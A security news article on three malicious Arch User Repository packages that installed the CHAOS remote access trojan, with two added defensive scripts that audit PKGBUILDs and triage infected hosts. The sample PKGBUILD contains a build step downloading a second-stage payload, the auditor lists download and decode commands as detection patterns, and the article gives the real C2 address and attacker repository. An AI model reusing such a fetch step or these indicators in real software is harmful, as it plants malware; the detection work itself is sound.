Ethical Hacking News
Three malicious packages that installed the CHAOS RAT malware were recently uploaded to the Arch User Repository (AUR). The Arch Linux team removed them two days later, but the incident is a reminder of the ongoing threat landscape and of the importance of staying informed about emerging threats.
The Arch User Repository (AUR) briefly hosted three malicious packages that delivered the CHAOS remote access trojan (RAT). The packages were uploaded by a user named "danikpapas" on July 16 and removed from the AUR two days later. CHAOS RAT can be used for cryptocurrency mining, credential harvesting, data theft, and cyber espionage. The Arch Linux team removed the packages promptly and advised users to remove them from their systems. The incident highlights the importance of formal review processes for new or updated packages in package repositories like the AUR.
Arch Linux, a popular open-source operating system known for its simplicity and flexibility, recently faced an unexpected challenge when three malicious packages uploaded to the Arch User Repository (AUR) were found to be infected with the CHAOS remote access trojan (RAT). The AUR is a repository where Arch Linux users can publish package build scripts (PKGBUILDs) to automate the process of downloading, building, and installing software that is not included with the operating system.
The packages in question, "librewolf-fix-bin", "firefox-patch-bin", and "zen-browser-patched-bin", were uploaded by a user named "danikpapas" on July 16, two days before they were removed from the AUR. The packages were found to contain malicious code that was executed during the build or installation phase. Their PKGBUILDs pulled in a GitHub repository under the attacker's control: https://github.com/danikpapas/zenbrowser-patch.git.
When the PKGBUILD is processed, this repository is cloned and treated as part of the package's patching and build process. Instead of a legitimate patch, however, the repository contained malicious code that was executed during the build or installation phase. The malware it delivered is commonly used in cryptocurrency mining campaigns but can also be used for harvesting credentials, stealing data, or conducting cyber espionage.
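The mechanism just described (a `source=()` entry that clones a git repository at build time, followed by build-phase functions that run whatever arrived) is something a reviewer can check for mechanically before running `makepkg`. The script below is an added example, not code from the article or from the Arch project: it lists the remote sources of a PKGBUILD, flags git sources (and whether they are pinned to a commit), flags download hosts outside a reviewer-chosen allowlist, and flags network or decode commands inside `prepare()`, `build()`, `package()` and friends. The allowlist, the sample PKGBUILD, its package name and its hosts are all constructed placeholders; the sample is only shaped like the packages the article describes.

```shell
#!/bin/sh
# Added example, not code from the article or the Arch project: a reviewer's
# audit of a PKGBUILD for the pattern described above, i.e. a source array that
# checks out a git repository at build time, and build-phase functions that
# reach the network. Assumptions: POSIX sh, awk, grep, tr; the allowlist of
# download hosts is the reviewer's choice (constructed here).

TRUSTED_HOSTS="download.example.org archive.mozilla.org"

# Each entry of the source=( ... ) array (also source_x86_64 etc.), one per
# line, quotes removed.
pkgbuild_sources() {
    awk '
        /^source(_[a-z0-9_]+)?=\(/ { insrc = 1; sub(/^[^(]*\(/, "") }
        insrc {
            line = $0
            if (line ~ /\)/) { sub(/\).*/, "", line); insrc = 0 }
            n = split(line, parts, /[ \t]+/)
            for (i = 1; i <= n; i++) if (parts[i] != "") print parts[i]
        }
    ' "$1" | tr -d "\"'"
}

# Bodies of the functions makepkg runs, assuming the usual "name() {" / "}"
# layout at column 0.
pkgbuild_build_steps() {
    awk '
        /^(prepare|pkgver|build|check|package)(_[a-z0-9_-]+)?\(\)/ { infn = 1; next }
        /^}/ { infn = 0 }
        infn { print }
    ' "$1"
}

# One FINDING line per suspicious item; always exits 0, the caller decides.
audit_pkgbuild() {
    file=$1
    for src in $(pkgbuild_sources "$file"); do
        url=${src#*::}   # drop the optional "localname::" rename prefix
        case $url in
            git+*|*.git|*.git#*)
                pin="unpinned (no #commit= fragment)"
                case $url in *'#commit='*) pin="pinned" ;; esac
                echo "FINDING: git repository checked out at build time, $pin: $src" ;;
        esac
        case $url in
            *://*)
                host=${url#*://}; host=${host%%/*}
                allowed=0
                for h in $TRUSTED_HOSTS; do
                    if [ "$host" = "$h" ]; then allowed=1; fi
                done
                if [ "$allowed" -eq 0 ]; then
                    echo "FINDING: source host not on the allowlist: $host ($src)"
                fi ;;
        esac
    done
    pkgbuild_build_steps "$file" \
        | grep -E 'curl|wget|git (clone|fetch|pull)|\| *(ba)?sh|base64 +-d' \
        | while IFS= read -r hit; do
            echo "FINDING: network or decode step inside a build function: $hit"
        done
    return 0
}

# Number of findings, for scripting: 0 means nothing to flag.
audit_count() {
    audit_pkgbuild "$1" | awk '/^FINDING/ { n++ } END { print n + 0 }'
}

# Constructed sample shaped like the malicious packages described in the
# article (placeholder names and hosts, not the real repository or package).
SAMPLE_PKGBUILD=$(mktemp)
cat > "$SAMPLE_PKGBUILD" <<'EOF'
pkgname=example-browser-patched-bin
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://download.example.org/example-browser-${pkgver}.tar.xz"
        "git+https://git.example.invalid/someone/browser-patch.git")
sha256sums=('SKIP' 'SKIP')

prepare() {
    cd "$srcdir/browser-patch"
    curl -fsSL "http://198.51.100.10:8080/stage2" -o "$srcdir/systemd-initd"
}

package() {
    install -Dm755 "$srcdir/example-browser/example" "$pkgdir/usr/bin/example"
}
EOF

audit_pkgbuild "$SAMPLE_PKGBUILD"      # prints three FINDING lines
```

Two design points worth noting. A host allowlist alone would not have caught this incident, since the attacker's repository lived on github.com; the finding that matters is the git source itself, especially an unpinned one whose checksum is `SKIP`, because its contents can change after the PKGBUILD was reviewed. The function-body scan is deliberately crude (it looks for the tools, not their intent), so treat its output as a list of lines to read, not as a verdict.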
The CHAOS RAT malware is an open-source remote access trojan (RAT) for Windows and Linux that can be used to upload and download files, execute commands, and open a reverse shell. Ultimately, threat actors have full access to an infected device. Once installed, the malware repeatedly connects back to a command and control (C2) server where it waits for commands to execute.
In this campaign, the C2 server was located at 130.162[.]225[.]47:8080. The Arch Linux team removed all three packages by July 18th at around 6 PM UTC+2.
"We strongly encourage users that may have installed one of these packages to remove them from their system and to take the necessary measures in order to ensure they were not compromised," warned the Arch Linux team.
Given the severity of the malware, anyone who has mistakenly installed these packages is advised to check for a suspicious "systemd-initd" executable running on their computer, which may be located in the /tmp folder. If found, it should be deleted.
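The check above, together with the C2 endpoint reported earlier, can be scripted as a read-only triage pass. The following is an added example, not code from the article: it looks for an executable named `systemd-initd` under a given root, for a running process by that name in a `ps -eo pid=,comm=,args=` listing, and for an established socket to 130.162.225.47:8080 in `ss -ntp` output. The fake root, the process listing and the socket listing are constructed sample data (RFC 5737 documentation addresses), built inside a temporary directory so nothing touches the real /tmp.

```shell
#!/bin/sh
# Added example, not code from the article: a read-only triage check for the
# indicators listed above (an executable named systemd-initd under /tmp, a
# running process by that name, and a connection to the reported C2 endpoint).
# Assumptions: POSIX sh, find, awk, sed; process and socket listings are
# supplied as files holding `ps -eo pid=,comm=,args=` and `ss -ntp` output.

C2_ENDPOINT="130.162.225.47:8080"   # from the article (defanged there as 130.162[.]225[.]47)

# Executables named systemd-initd under the given root (a live / or /tmp, or a
# mounted image for offline analysis).
find_dropped_binary() {
    find "$1" -type f -name systemd-initd -perm -100 2>/dev/null
}

# Lines of `ps -eo pid=,comm=,args=` whose command name or binary path is systemd-initd.
find_rat_process() {
    awk '$2 == "systemd-initd" || $3 ~ /(^|\/)systemd-initd$/ { print "pid=" $1 " " $3 }' "$1"
}

# Lines of `ss -ntp` whose peer address (column 5) is the C2 endpoint.
find_c2_connection() {
    awk -v c2="$C2_ENDPOINT" '$5 == c2 { print }' "$1"
}

# One INDICATOR line per hit, then "indicators: N" as the last line.
triage_host() {
    root=$1; ps_file=$2; ss_file=$3
    {
        find_dropped_binary "$root" | sed 's/^/INDICATOR: dropped binary /'
        find_rat_process "$ps_file" | sed 's/^/INDICATOR: running process /'
        find_c2_connection "$ss_file" | sed 's/^/INDICATOR: C2 connection /'
    } | awk '{ print } /^INDICATOR/ { n++ } END { print "indicators: " n + 0 }'
}

# Just the count, for scripting: 0 means none of the indicators were seen.
indicator_count() {
    triage_host "$1" "$2" "$3" | sed -n 's/^indicators: //p'
}

# Constructed sample host state: a fake root holding the dropped file, plus
# ps/ss listings as they would look on an affected machine (RFC 5737 addresses).
SAMPLE_ROOT=$(mktemp -d)
mkdir -p "$SAMPLE_ROOT/tmp"
printf '#!/bin/sh\n' > "$SAMPLE_ROOT/tmp/systemd-initd"
chmod 700 "$SAMPLE_ROOT/tmp/systemd-initd"
SAMPLE_PS="$SAMPLE_ROOT/ps.txt"
SAMPLE_SS="$SAMPLE_ROOT/ss.txt"
cat > "$SAMPLE_PS" <<'EOF'
    1 systemd        /sbin/init
 4242 systemd-initd  /tmp/systemd-initd
 4300 firefox        /usr/lib/firefox/firefox
EOF
cat > "$SAMPLE_SS" <<'EOF'
ESTAB 0 0 192.0.2.5:41234 130.162.225.47:8080 users:(("systemd-initd",pid=4242,fd=3))
ESTAB 0 0 192.0.2.5:51002 198.51.100.7:443    users:(("firefox",pid=4300,fd=88))
EOF

triage_host "$SAMPLE_ROOT" "$SAMPLE_PS" "$SAMPLE_SS"   # three INDICATOR lines, then "indicators: 3"
```

On a live host, save `ps -eo pid=,comm=,args=` and `ss -ntp` output to files (both need root to show other users' process names) and pass the real `/` or `/tmp` as the root. Before deleting a hit as the article recommends, record its hash and keep a copy off the machine, since the name "systemd-initd" is chosen to blend in with legitimate systemd processes and the file is the main evidence of what actually ran. The C2 address is a point-in-time indicator; a process that matches by name but connects elsewhere is still worth investigating.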
The incident serves as a reminder of the importance of formal review processes for new or updated packages in package repositories like the AUR. While all three packages have now been removed, other malicious packages could still be uploaded, highlighting the need for continuous vigilance and awareness among users.
In recent weeks, there has been an increase in reports of malware infections on Linux systems. This incident underscores the importance of staying informed about emerging threats and taking proactive steps to protect oneself against cyber attacks. It also highlights the value of community-driven efforts such as those seen in the AUR and Reddit forums, where users quickly identified the suspicious comments and alerted others.
The Arch Linux team's swift action in removing the malicious packages demonstrates its commitment to maintaining a secure environment for users. The incident also serves as a reminder that even seemingly innocuous repositories can be vulnerable to malware attacks if not properly vetted.
In conclusion, the recent discovery of CHAOS RAT-infected packages on the AUR highlights the ongoing threat landscape in the cybersecurity world. As security experts and researchers continue to monitor emerging threats, it is crucial for users to remain vigilant and take proactive steps to protect themselves against cyber attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/Malicious-Chaos-Arch-Linux-Pulls-AUR-Packages-Infected-with-CHAOS-RAT-Malware-ehn.shtml
https://www.bleepingcomputer.com/news/security/arch-linux-pulls-aur-packages-that-installed-chaos-rat-malware/
Published: Fri Jul 18 17:26:04 2025 by llama3.2 3B Q4_K_M